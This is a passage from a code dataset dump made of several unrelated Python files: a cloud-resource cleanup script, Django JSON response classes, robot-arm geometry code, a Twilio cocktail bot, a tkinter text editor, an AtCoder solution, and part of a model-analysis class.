loop\")\n\n time.sleep(time_sleep_s)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format=\"%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s\",\n level=logging.DEBUG)\n\n main(sys.argv[1:])\n","sub_path":"src/job-exporter/src/job_exporter.py","file_name":"job_exporter.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525331214","text":"import requests\nimport json\nfrom cklib.logging import log\nfrom cklib.args import ArgumentParser\nfrom cklib.graph import Graph, sanitize\nfrom cklib.graph.export import node_from_dict\nfrom cklib.jwt import encode_jwt_to_headers\nfrom cklib.cleaner import Cleaner\n\n\ndef cleanup():\n \"\"\"Run resource cleanup\"\"\"\n\n def process_data_line(data: dict, graph: Graph):\n \"\"\"Process a single line of ckcore graph data\"\"\"\n\n if data.get(\"type\") == \"node\":\n node_id = data.get(\"id\")\n node = node_from_dict(data)\n node_mapping[node_id] = node\n log.debug(f\"Adding node {node} to the graph\")\n graph.add_node(node)\n if node.kind == \"graph_root\":\n log.debug(f\"Setting graph root {node}\")\n graph.root = node\n elif data.get(\"type\") == \"edge\":\n node_from = data.get(\"from\")\n node_to = data.get(\"to\")\n if node_from not in node_mapping or node_to not in node_mapping:\n raise ValueError(f\"One of {node_from} -> {node_to} unknown\")\n graph.add_edge(node_mapping[node_from], node_mapping[node_to])\n\n log.info(\"Running cleanup\")\n base_uri = ArgumentParser.args.ckcore_uri.strip(\"/\")\n ckcore_graph = ArgumentParser.args.ckcore_graph\n graph_uri = f\"{base_uri}/graph/{ckcore_graph}\"\n query_uri = f\"{graph_uri}/query/graph\"\n query_filter = \"\"\n if ArgumentParser.args.collector and len(ArgumentParser.args.collector) > 0:\n clouds = '[\"' + '\", \"'.join(ArgumentParser.args.collector) + '\"]'\n query_filter = f\"and metadata.ancestors.cloud.id in {clouds} \"\n query = f\"desired.clean == true {query_filter}<-[0:]->\"\n log.debug(f\"Sending query {query}\")\n\n headers = {\"accept\": \"application/x-ndjson\"}\n if getattr(ArgumentParser.args, \"psk\", None):\n encode_jwt_to_headers(headers, {}, ArgumentParser.args.psk)\n\n r = requests.post(query_uri, data=query, headers=headers, stream=True)\n if r.status_code != 200:\n log.error(r.content)\n raise RuntimeError(f\"Failed to query graph: {r.content}\")\n graph = Graph()\n node_mapping = {}\n\n for line in r.iter_lines():\n if not line:\n continue\n data = json.loads(line.decode(\"utf-8\"))\n try:\n process_data_line(data, graph)\n except ValueError as e:\n log.error(e)\n continue\n sanitize(graph)\n cleaner = Cleaner(graph)\n cleaner.cleanup()\n\n\ndef add_args(arg_parser: ArgumentParser) -> None:\n Cleaner.add_args(arg_parser)\n","sub_path":"ckworker/ckworker/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"253222314","text":"import sys\nimport traceback\n\nfrom django import http\nfrom django.conf import settings\nfrom django.utils.translation import gettext as _\n\nfrom .settings import api_settings\n\n__all__ = [\n \"JSONResponse\",\n \"StreamingJSONResponse\",\n \"JSONErrorResponse\",\n \"Http200\",\n \"Http201\",\n \"Http204\",\n \"Http400\",\n \"Http401\",\n \"Http403\",\n \"Http404\",\n \"Http405\",\n \"Http409\",\n \"Http500\",\n]\n\nHTTP_HEADER_ENCODING = \"iso-8859-1\"\n\n\nclass JSONResponse(http.HttpResponse):\n \"\"\"An HTTP response class that consumes data to be serialized to JSON.\"\"\"\n\n def __init__(self, data, **kwargs):\n kwargs.setdefault(\"content_type\", \"application/json\")\n data = api_settings.JSON_ENCODER().encode(data).encode(\"utf-8\")\n super().__init__(content=data, **kwargs)\n\n\nclass StreamingJSONResponse(http.StreamingHttpResponse):\n def __init__(self, data, **kwargs):\n kwargs.setdefault(\"content_type\", \"application/json\")\n data = api_settings.JSON_ENCODER().iterencode(data)\n super().__init__(streaming_content=data, **kwargs)\n\n\nclass JSONErrorResponse(JSONResponse):\n \"\"\"A JSON response class for simple API errors.\"\"\"\n\n default_reason = None\n status_code = 500\n\n def __init__(self, reason=None, **kwargs):\n data = reason or self.default_reason\n if data is None or isinstance(data, str):\n data = {\"errors\": {\"detail\": [{\"message\": reason or self.default_reason}],}}\n\n if settings.DEBUG:\n exc = sys.exc_info()\n if exc[0] is not None:\n data[\"meta\"] = {\"traceback\": \"\".join(traceback.format_exception(*exc))}\n super().__init__(data, **kwargs)\n\n\nclass Http200(JSONResponse):\n \"\"\"HTTP 200 OK\"\"\"\n\n pass\n\n\nclass Http201(JSONResponse):\n \"\"\"HTTP 201 Created\"\"\"\n\n status_code = 201\n\n\nclass Http204(http.HttpResponse):\n \"\"\"HTTP 204 No Content\"\"\"\n\n status_code = 204\n\n\nclass Http400(JSONErrorResponse):\n \"\"\"HTTP 400 Bad Request\"\"\"\n\n status_code = 400\n\n\nclass Http401(JSONErrorResponse):\n \"\"\"HTTP 401 Unauthorized\"\"\"\n\n status_code = 401\n\n\nclass Http403(JSONErrorResponse):\n \"\"\"HTTP 403 Forbidden\"\"\"\n\n status_code = 403\n\n\nclass Http404(JSONErrorResponse):\n \"\"\"HTTP 404 Not Found\"\"\"\n\n status_code = 404\n\n\nclass Http405(JSONResponse):\n \"\"\"HTTP 405 Method Not Allowed\"\"\"\n\n status_code = 405\n\n def __init__(self, method, permitted_methods, *args, **kwargs):\n data = {\n \"errors\": {\n \"detail\": [{\"message\": _('Method \"{0}\" not allowed').format(method)}],\n }\n }\n super().__init__(data=data, *args, **kwargs)\n self[\"Allow\"] = \", \".join(permitted_methods)\n\n\nclass Http409(JSONErrorResponse):\n \"\"\"HTTP 409 Conflict\"\"\"\n\n status_code = 409\n\n\nclass Http500(JSONErrorResponse):\n \"\"\"HTTP 500 Internal Server Error\"\"\"\n\n pass\n","sub_path":"resticus/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"180706669","text":"import math\nfrom math import pi\n\n\ndef cos(theta):\n return math.cos(theta / 180 * pi)\n\n\ndef sin(theta):\n return math.sin(theta / 180 * pi)\n\n\ndef PointInNewCoor(PointFixed, Coordinate, Origin):\n PointNew = [0, 0, 0]\n for i in range(3):\n PointNew[i] = sum(list(map(lambda p, v: p * v[i], PointFixed, Coordinate)))\n return list(map(lambda p, o: p + o, PointNew, Origin))\n\n\ndef GenBoxFromFourPoints(FourPoints):\n Box = []\n Ps = {}\n Ps[0], Ps[1], Ps[2], Ps[4] = FourPoints\n Ps[3] = list(map(lambda p0, p1, p2: p2 + p0 - p1, Ps[0], Ps[1], Ps[2]))\n for i in range(5, 8):\n Ps[i] = list(map(lambda pi_4, p0, p4: pi_4 + p4 - p0, Ps[i - 4], Ps[0], Ps[4]))\n for i in range(8):\n Box.append(Ps[i])\n return Box\n\n\ndef UpdateCoordinate(Part):\n if Part.Type == \"Base\":\n return\n if Part.Type == \"ArmLvl\":\n Part.Origin = Part.Pre.End\n Now=Part\n while (1):\n Now=Now.Pre\n if Now.Type==\"TurnTable\":\n break\n Part.Coordinate=Now.Coordinate\n else:\n if Part.Axe == \"z\":\n Part.Origin = Part.Pre.End\n Part.Coordinate = Part.Pre.Coordinate\n i_Pre, j_Pre, k_Pre = Part.Coordinate\n k_Turned = k_Pre\n i_Turned = list(map(lambda i, j: i * cos(Part.TurnedAngle) + j * sin(Part.TurnedAngle), i_Pre, j_Pre))\n j_Turned = list(map(lambda i, j: -i * sin(Part.TurnedAngle) + j * cos(Part.TurnedAngle), i_Pre, j_Pre))\n Part.Coordinate = [i_Turned, j_Turned, k_Turned]\n elif Part.Axe == \"y\":\n Part.Origin = Part.Pre.End\n Part.Coordinate = Part.Pre.Coordinate\n i_Pre, j_Pre, k_Pre = Part.Coordinate\n j_Turned = j_Pre\n i_Turned = list(map(lambda i, k: -k * sin(Part.TurnedAngle) + i * cos(Part.TurnedAngle), i_Pre, k_Pre))\n k_Turned = list(map(lambda i, k: k * cos(Part.TurnedAngle) + i * sin(Part.TurnedAngle), i_Pre, k_Pre))\n Part.Coordinate = [i_Turned, j_Turned, k_Turned]\n return\n\n\ndef UpdateBox(Part):\n Part.BoxFixed = GenBoxFromFourPoints(Part.FourPoints)\n Part.Box = deepcopy(Part.BoxFixed)\n for i in range(8):\n Part.Box[i] = PointInNewCoor(Part.BoxFixed[i], Part.Coordinate, Part.Origin)\n return\n\n\ndef UpdatePart(Part):\n UpdateCoordinate(Part)\n Part.End = PointInNewCoor(Part.ConnectPoint, Part.Coordinate, Part.Origin)\n UpdateBox(Part)\n if Part.Next is not None:\n UpdatePart(Part.Next)\n else:\n return\n\n\nfrom copy import deepcopy\n\n\nclass Base:\n def __init__(self, Name):\n self.Name = Name\n self.Type = \"Base\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]] # i,j,k vector of coordinate system\n\n self.FourPoints = [[62.5,-67,70] , [-62.5,-67,70],[-62.5,67,70], [62.5,-67,0]] # I II III V Octant.These four points are under self-fixed coordinate.\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.End = [0, 0, 70]\n\n self.Next = None\n\n\nclass TurnTable:\n def __init__(self, Name):\n self.Name = Name\n self.Type = \"TurnTable\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = [[36, -71, 60], [36, 71, 60], [-36, 71, 60], [36, -71, 0]]\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = [13.2, 0, 36.1]\n self.End = deepcopy(self.ConnectPoint)\n\n self.TurnedAngle = 0\n self.LimInterval = [-90, 90]\n self.Axe = \"z\"\n self.Speed=40\n\n self.Pre = None\n self.Next = None\n\n def Turn2Angle(self, Angle):\n self.TurnedAngle = Angle\n if self.TurnedAngle > self.LimInterval[1]:\n self.TurnedAngle = self.LimInterval[1]\n elif self.TurnedAngle < self.LimInterval[0]:\n self.TurnedAngle = self.LimInterval[0]\n UpdatePart(self)\n\n def TurnDeltaAngle(self, DeltaAngle):\n self.Turn2Angle(self.TurnedAngle + DeltaAngle)\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\n\nclass Arm:\n def __init__(self, Name, FourPoints,ConnectPoint):\n self.Name = Name\n self.Type = \"Arm\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = FourPoints\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = ConnectPoint\n self.End = deepcopy(self.ConnectPoint)\n\n self.TurnedAngle = 0\n self.LimInterval = [-90, 90]\n self.Axe = \"y\"\n self.Speed=40\n\n self.Pre = None\n self.Next = None\n\n def Turn2Angle(self, Angle):\n self.TurnedAngle = Angle\n if self.TurnedAngle > self.LimInterval[1]:\n self.TurnedAngle = self.LimInterval[1]\n elif self.TurnedAngle < self.LimInterval[0]:\n self.TurnedAngle = self.LimInterval[0]\n UpdatePart(self)\n\n def TurnDeltaAngle(self, DeltaAngle):\n self.Turn2Angle(self.TurnedAngle + DeltaAngle)\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\nclass ArmLvl:\n def __init__(self,Name,FourPoints,ConnectPoint):\n self.Name=Name\n self.Type=\"ArmLvl\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = FourPoints\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = ConnectPoint\n self.End = deepcopy(self.ConnectPoint)\n\n self.Pre = None\n self.Next = None\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\n\nclass Hand:\n def __init__(self, Name, FourPoints):\n self.Name = Name\n self.Type = \"Hand\"\n\n self.Origin = [0, 0, 0]\n self.Coordinate = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n\n self.FourPoints = FourPoints\n self.BoxFixed = GenBoxFromFourPoints(self.FourPoints)\n self.Box = deepcopy(self.BoxFixed)\n\n self.ConnectPoint = [0,0,0]\n self.End = deepcopy(self.ConnectPoint)\n\n self.TurnedAngle = 0\n self.LimInterval = [-90, 90]\n self.Axe = \"z\"\n\n self.Pre = None\n self.Next = None\n\n def Turn2Angle(self, Angle):\n self.TurnedAngle = Angle\n if self.TurnedAngle > self.LimInterval[1]:\n self.TurnedAngle = self.LimInterval[1]\n elif self.TurnedAngle < self.LimInterval[0]:\n self.TurnedAngle = self.LimInterval[0]\n UpdatePart(self)\n\n def TurnDeltaAngle(self, DeltaAngle):\n self.Turn2Angle(self.TurnedAngle + DeltaAngle)\n\n def ConnectPre(self, Pre):\n self.Pre = Pre\n self.Pre.Next = self\n UpdatePart(self)\n\n","sub_path":"Common/Virtual-uArm/Code-Python/Structure.py","file_name":"Structure.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614444975","text":"from flask import Flask, request\nimport requests\nimport json\n\nfrom twilio.twiml.messaging_response import MessagingResponse\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n url = 'https://thecocktaildb.com/api/json/v1/1/random.php'\n r = requests.get(url)\n if r.status_code == 200:\n data = r.json()\n recipe = data[\"drinks\"]\n aname = [item[\"strDrink\"] for item in recipe]\n fname = [aname[0]]\n name = fname\n else:\n name = \"I could not retrieve your recipe\"\n return str(name)\n\n\n@app.route(\"/bot\", methods=[\"POST\"])\ndef bot():\n incoming_msg = request.values.get('Body', '').lower()\n resp = MessagingResponse()\n msg = resp.message()\n responded = False\n if 'drink' in incoming_msg:\n url = 'https://thecocktaildb.com/api/json/v1/1/random.php'\n r = requests.get(url)\n if r.status_code == 200:\n data = r.json()\n recipe = data[\"drinks\"]\n drink = [item[\"strDrink\"] for item in recipe]\n fname = f'{drink}'\n print(fname)\n msg.body(fname)\n responded = True\n if 'picture' in incoming_msg:\n msg.media('https://source.unsplash.com/random/400x400')\n responded = True\n if not responded:\n msg.body = \"I could not retrieve a drink from the db\"\n return str(resp)\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492531686","text":"from tkinter import *\nfrom tkinter import filedialog\n\ndef doNothing():\n x = 0\n\ndef createMainWindow():\n root = Tk()\n root.title(\"Coral Text Editor\")\n root.geometry();\n return root\n\n\ndef addTextWidget(mainWindow):\n text=Text(mainWindow)\n text.pack(fill=BOTH, expand=YES)\n return text\n\n\ndef addSaveButton(mainWindow):\n button = Button(mainWindow, text=\"Save\", command=saveAs)\n button.pack(side=RIGHT, padx=5, pady=5)\n\n\ndef addOpenButton(mainWindow):\n button = Button (mainWindow, text=\"Open\")\n button.grid()\n\n\ndef saveAs():\n global filePath\n t = text.get(\"1.0\", \"end-1c\")\n savelocation = filedialog.asksaveasfilename()\n file1 = open(savelocation, \"w+\")\n file1.write(t)\n file1.close()\n filePath = savelocation\n\n\ndef save():\n global filePath\n t = text.get(\"1.0\", \"end-1c\")\n file1 = open(filePath, \"w+\")\n\n file1.write(t)\n file1.close()\n\ndef setText(value):\n text.delete(1.0, END)\n text.insert(END, value)\n\ndef openFile():\n global filePath\n openlocation = filedialog.askopenfilename()\n with open(openlocation) as f: \n t = f.read()\n setText(t)\n filePath = openlocation\n\n\ndef addMenuBar(root):\n menubar = Menu(root)\n fileMenu = Menu(menubar, tearoff=0)\n fileMenu.add_command(label=\"Open\", command=openFile)\n fileMenu.add_command(label=\"Save as\", command=saveAs)\n fileMenu.add_command(label=\"Save\", command=save)\n fileMenu.add_command(label=\"Exit\", command=doNothing)\n \n\n settingsMenu = Menu(menubar, tearoff=0)\n settingsMenu.add_command(label=\"Change color scheme\", command=doNothing)\n \n helpMenu = Menu(menubar, tearoff=0)\n\n menubar.add_cascade(label=\"File\", menu=fileMenu)\n menubar.add_cascade(label=\"Settings\", menu=settingsMenu)\n menubar.add_cascade(label=\"Help\", menu=helpMenu)\n return menubar\n\ndef main():\n global text, filePath\n mainWindow = createMainWindow();\n text = addTextWidget(mainWindow)\n\n menubar = addMenuBar(mainWindow)\n \n mainWindow.config(menu=menubar)\n mainWindow.mainloop()\n\n \nif __name__ == '__main__':\n main()\n","sub_path":"coral.py","file_name":"coral.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"214964186","text":"\n\"\"\"\nhttps://atcoder.jp/contests/abc168/tasks/abc168_e\n\nある組みについてA[i]*A[j] + B[i]*B[j] = 0とならないように要素を選ぶ場合の数.\n\n題意を満たすには,以下の場合がある.\na=b=0: その要素一つのみを選ぶ.\na=0,b!=0 or a!=0,b=0: この二つの要素の組みは題意を満たす.この時,非ゼロの数の値は何でも\n よいので,適当に1にしておく.\na!=0,b!=0: 定数倍は考慮しないので,aとbの最大公約数で両者を割っておく.\n\n以上より,題意を満たすのは,\n(a, b), (b, a)の組みであり,かつ積の符号が異なるものである.\nここでは,a!=0, a*b>=0: (a, b),それ以外: (b, a)としている.\n\n数え上げる時には,(a, b)それぞれの数について,d[p][0]^2 + d[p][1]^2 - 1となる.\nつまり,(a, b)の中の要素それぞれのin-out, (b, a)の中の要素それぞれのin-out,\n全てが入らない場合を除くので-1である.\n\"\"\"\n\nfrom math import gcd\n\nN = int(input())\nX = [list(map(int, input().split())) for _ in range(N)]\n\nd = {}\nfor a, b in X:\n if a == b == 0:\n pass\n elif a == 0:\n b = 1\n elif b == 0:\n a = 1\n else:\n v = gcd(a, b)\n a //= v\n b //= v\n\n if a != 0 and a * b >= 0:\n pair = (abs(a), abs(b))\n if pair not in d:\n d[pair] = [0, 0]\n d[pair][0] += 1\n else:\n pair = (abs(b), abs(a))\n if pair not in d:\n d[pair] = [0, 0]\n d[pair][1] += 1\n\nMOD = 10 ** 9 + 7\nzero = 0\nans = 1\nfor p in d:\n if p == (0, 0):\n zero = d[p][1]\n else:\n a, b = d[p]\n ans *= pow(2, a, MOD) + pow(2, b, MOD) - 1\n ans %= MOD\n\nprint((ans + zero - 1) % MOD)\n","sub_path":"src/solutions/abc168_e.py","file_name":"abc168_e.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"50993444","text":"import abc\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nfrom odin.utils import get_root_logger\nfrom odin.utils.draw_utils import make_multi_category_plot, display_sensitivity_impact_plot, \\\n plot_categories_curve, plot_class_distribution\n\nlogger = get_root_logger()\n\n\nclass AnalyzerInterface(metaclass=abc.ABCMeta):\n\n __detector_name = \"detector\"\n result_saving_path = \"./results/\"\n\n dataset = None\n\n __valid_metrics = None\n __valid_curves = None\n metric = None\n\n # ONLY FOR TESTING, TO REMOVE\n use_new_normalization = True # if True use the new implementation of normalization (categories + properties),\n # otherwise use the old one (only categories)\n\n _use_normalization = False\n _norm_factors = None\n normalizer_factor = 1\n\n conf_thresh = 0.5\n\n saved_results = {}\n fp_errors = None\n\n __SAVE_PNG_GRAPHS = True\n\n __is_binary = False\n\n def __init__(self, detector_name, dataset, result_saving_path, use_normalization, norm_factor_categories,\n norm_factors_properties, conf_thresh, metric, valid_metrics, valid_curves, is_binary,\n save_graphs_as_png):\n\n self.__detector_name = detector_name\n self.dataset = dataset\n\n if not os.path.exists(result_saving_path):\n os.mkdir(result_saving_path)\n self.result_saving_path = os.path.join(result_saving_path, detector_name)\n if not os.path.exists(self.result_saving_path):\n os.mkdir(self.result_saving_path)\n\n self._use_normalization = use_normalization\n self._norm_factors = self.__create_norm_factors_dict(norm_factor_categories, norm_factors_properties)\n self.conf_thresh = conf_thresh\n self.metric = metric\n self.__valid_metrics = valid_metrics\n self.__valid_curves = valid_curves\n self.__is_binary = is_binary\n self.__SAVE_PNG_GRAPHS = save_graphs_as_png\n\n def analyze_property(self, property_name, possible_values=None, labels=None, show=True, metric=None):\n \"\"\"Analyzes the performances of the model for each category considering only the ground truth having a certain\n property value.\n\n Parameters\n ----------\n property_name: str\n Name of the property to analyze\n possible_values: list, optional\n Property values to be analyzed. If None consider all the possible values of the property. (default is None)\n labels: list, optional\n Property values names to show in the graph. If None use the display name in the properties file.\n (default is None)\n show: bool, optional\n If True results are shown in a graph. (default is True)\n metric: str, optional\n Metric used for the analysis. If None use the default metrics. (default is None)\n\n \"\"\"\n if property_name not in self.dataset.get_property_keys():\n logger.error(f\"Property '{property_name}' not valid\")\n return\n if possible_values is None or not possible_values:\n possible_values = self.dataset.get_values_for_property(property_name)\n else:\n if not self._is_valid_property(property_name, possible_values):\n return\n if labels is None:\n labels = []\n for p in possible_values:\n display_name = self.dataset.get_display_name_of_property_value(property_name, p)\n if display_name is None:\n labels.append(p)\n else:\n labels.append(display_name)\n elif len(possible_values) != len(labels):\n logger.error(\"Inconsistency between number of possible values and labels.\")\n return\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n if metric not in self.saved_results.keys():\n self.saved_results[metric] = {}\n if self.__is_binary:\n categories = [self.dataset.get_categories_names()[0]]\n else:\n categories = self.dataset.get_categories_names()\n for category in categories:\n category_id = self.dataset.get_category_id_from_name(category)\n if category not in self.saved_results[metric].keys():\n self.saved_results[metric][category] = {}\n self.saved_results[metric][category]['all'] = self._calculate_metric_for_category(category,\n metric=metric)\n matching = self.saved_results[metric][category]['all'][\"matching\"]\n self.saved_results[metric][category][property_name] = self._calculate_metric_for_properties_of_category(\n category, category_id, property_name, possible_values, matching, metric=metric)\n\n title = \"Analysis of {} property\".format(property_name)\n\n if show:\n make_multi_category_plot(self.saved_results[metric], property_name, labels, title, metric,\n self.__SAVE_PNG_GRAPHS, self.result_saving_path)\n\n def analyze_properties(self, properties=None, metric=None):\n \"\"\"Analyzes the performances of the model for each category considering only the ground truth having a certain\n property value. The analysis is performed for all the properties specified in the parameters.\n\n Parameters\n ----------\n properties: list of str, optional\n Names of the properties to analyze. If None perform the analysis for all the properties. (default is None)\n metric: str\n Metric used for the analysis. If None use the default metrics. (default is None)\n \"\"\"\n if properties is None:\n properties = self.dataset.get_property_keys()\n else:\n if not self._are_valid_properties(properties):\n return\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n for pkey in properties:\n values = self.dataset.get_values_for_property(pkey)\n self.analyze_property(pkey, values, metric=metric)\n\n def show_distribution_of_properties(self, properties=None):\n \"\"\"Shows the distribution of the property among its different values and for each property value shows the\n distribution among the categories.\n\n Parameters\n ----------\n properties: list of str, optional\n Names of the properties to analyze the distribution. If None perform the analysis for all the properties.\n (default is None)\n \"\"\"\n if properties is None:\n properties = self.dataset.get_property_keys()\n elif not self._are_valid_properties(properties):\n return\n for property in properties:\n self.show_distribution_of_property(property)\n\n\n def analyze_sensitivity_impact_of_properties(self, properties=None, metric=None):\n \"\"\"Analyzes the sensitivity and the impact of the properties specified in the parameters.\n\n Parameters\n ----------\n properties: list of str, optional\n Names of the properties to consider in the analysis. If None consider all the properties. (default is None)\n metric: str\n Metric used for the analysis. If None use the default metrics. (default is None)\n \"\"\"\n if properties is None:\n properties = self.dataset.get_property_keys()\n else:\n if not self._are_valid_properties(properties):\n return\n display_names = [self.dataset.get_display_name_of_property(pkey) for pkey in properties]\n\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n\n for pkey in properties:\n values = self.dataset.get_values_for_property(pkey)\n self.analyze_property(pkey, values, show=False, metric=metric)\n\n display_sensitivity_impact_plot(self.saved_results[metric], self.result_saving_path, properties,\n display_names, metric, self.__SAVE_PNG_GRAPHS)\n\n def get_tp_distribution(self, categories=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n\n if categories is not None:\n tp_classes = self._analyze_true_positive_for_categories(categories)\n plot_class_distribution(tp_classes, self.result_saving_path, self.__SAVE_PNG_GRAPHS, \"True Positive\")\n\n def get_fn_distribution(self, categories=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n\n if categories is not None:\n tp_classes = self._analyze_false_negative_for_categories(categories)\n plot_class_distribution(tp_classes, self.result_saving_path, self.__SAVE_PNG_GRAPHS, \"False Negative\")\n\n @abc.abstractmethod\n def _analyze_true_positive_for_categories(self, categories):\n pass\n\n @abc.abstractmethod\n def _analyze_false_negative_for_categories(self, categories):\n pass\n\n def get_fp_error_distribution(self, categories=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n self.fp_errors = None\n error_dict_total = self._analyze_false_positive_errors(categories)\n plot_class_distribution(error_dict_total[\"distribution\"], self.result_saving_path, self.__SAVE_PNG_GRAPHS,\n \"False Positive\")\n\n def analyze_false_positive_errors(self, categories=None, metric=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n if not self.__is_binary:\n self.get_fp_error_distribution(categories)\n for category in categories:\n self.analyze_false_positive_error_for_category(category, categories=categories, metric=metric)\n\n def analyze_curve_for_categories(self, categories=None, curve='precision_recall_curve'):\n if self.__is_binary:\n categories = [self.dataset.get_categories_names()[0]]\n else:\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n if not self.__is_valid_curve(curve):\n return\n results = self._compute_curve_for_categories(categories, curve)\n plot_categories_curve(results, curve, self.__SAVE_PNG_GRAPHS, self.result_saving_path)\n\n def set_normalization(self, use_normalization, with_properties=True, norm_factor_categories=None,\n norm_factors_properties=None):\n \"\"\"Sets the normalization for the metrics calculation\n\n Parameters\n ----------\n use_normalization: bool\n Specifies whether or not to use normalization\n with_properties: bool\n Specifies whether or not to normalize also on properties values\n norm_factor_categories: float, optional\n Categories normalization factor (default is 1/number of categories)\n norm_factors_properties: list of pairs, optional\n Properties normalization factors.\n\n Each pair specifies the normalization factor to apply to a specific property.\n (Example: [(name1, value1), (name2, value2), ...]\n \"\"\"\n self._use_normalization = use_normalization\n if with_properties:\n self.use_new_normalization = True\n else:\n self.use_new_normalization = False\n if norm_factor_categories is not None:\n self._norm_factors[\"categories\"] = norm_factor_categories\n if norm_factors_properties is not None:\n dataset_p_names = self.dataset.get_property_keys()\n for p_name, p_value in norm_factors_properties:\n if p_name in dataset_p_names:\n self._norm_factors[p_name] = p_value\n else:\n logger.warn(\"Invalid property name in 'norm_factors_properties'.\")\n self.clear_saved_results()\n self.fp_errors = None\n\n def set_confidence_threshold(self, threshold):\n \"\"\"Sets the threshold value. Predictions with a confidence lower than the threshold are ignored.\n\n Parameters\n ----------\n threshold: float\n Threshold value. Must be between 0 and 1\n \"\"\"\n if threshold < 0 or threshold > 1:\n logger.error(\"Invalid threshold value.\")\n return\n self.conf_thresh = threshold\n self.clear_saved_results()\n self.fp_errors = None\n\n def clear_saved_results(self, metrics=None):\n if metrics is None:\n self.saved_results = {}\n else:\n for m in metrics:\n if m in self.saved_results.keys():\n self.saved_results[m] = {}\n else:\n if self._is_valid_metric(m):\n logger.warn(f\"No data for metric {m}\")\n\n def _get_report_results(self, default_metrics, metrics, categories, properties, show_categories, show_properties):\n if metrics is None:\n metrics = default_metrics\n else:\n for m in metrics:\n if m not in default_metrics and m != 'custom':\n logger.error(\n \"Metric {} not supported for report. Available metrics: {}.\".format(m, default_metrics))\n return\n\n if self.__is_binary:\n show_categories = False\n else:\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not categories:\n logger.warn(\"Empty categories list\")\n show_categories = False\n else:\n if not self._are_valid_categories(categories):\n return\n\n if properties is None:\n properties = self.dataset.get_property_keys()\n elif not properties:\n logger.warn(\"Empty properties list\")\n show_properties = False\n else:\n if not self._are_valid_properties(properties):\n return\n\n input_report = self._get_input_report(properties, show_properties)\n results = {}\n types = {}\n if self.__is_binary:\n types = {\"total\": \"Total\"}\n else:\n types[\"avg macro\"] = \"Total\"\n types[\"avg micro\"] = \"Total\"\n if show_categories:\n for cat in categories:\n types[cat] = \"Category\"\n if show_properties:\n for prop in properties:\n p_values = self.dataset.get_values_for_property(prop)\n for p_value in p_values:\n p_value = prop + \"_\" + \"{}\".format(p_value)\n types[p_value] = \"Property\"\n\n type_dict = {\"type\": types}\n\n for metric in metrics:\n results[metric] = self._calculate_report_for_metric(input_report, categories, properties, show_categories,\n show_properties, metric)\n\n type_dataframe = pd.DataFrame(type_dict)\n\n data = pd.DataFrame(results)\n data = pd.merge(data, type_dataframe, left_index=True, right_index=True).reset_index()\n data = data.rename(columns={\"index\": \"label\"})\n data = data.set_index([\"type\", \"label\"])\n return data\n\n def _is_valid_metric(self, metric):\n if metric in self.__valid_metrics:\n return True\n logger.error(f\"Metric '{metric}' 